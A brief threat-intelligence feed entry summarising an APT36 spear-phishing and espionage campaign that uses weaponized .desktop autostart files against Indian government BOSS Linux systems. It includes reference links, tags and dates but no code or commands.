APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files

Aug. 25, 2025, 11:03 a.m.

Description

APT36, a Pakistan-based threat actor, is conducting a cyber-espionage campaign against Indian Government entities, targeting BOSS Linux systems with weaponized .desktop files. The group uses spear-phishing emails to deliver malicious payloads, exploiting the Linux environment to maintain persistent access and evade security controls. The campaign involves sophisticated tactics, including the use of custom malware, command and control servers, and data exfiltration techniques. The attackers leverage newly registered domains and employ various MITRE ATT&CK techniques to execute their operations. This activity demonstrates APT36's increasing sophistication and adaptability in targeting critical government infrastructure.

External References

https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files
https://otx.alienvault.com/pulse/68a999165ab79f5b181e6068
Tags
pakistan
persistence
india
government
spear-phishing
cyber-espionage
elf
boss linux
2025-08-23
.desktop files

Date

  • Created: Aug. 23, 2025, 10:33 a.m.
  • Published: Aug. 23, 2025, 10:33 a.m.
  • Modified: Aug. 25, 2025, 11:03 a.m.

Attack Patterns

  • APT36

Additional Informations

  • Government
  • British Indian Ocean Territory
  • India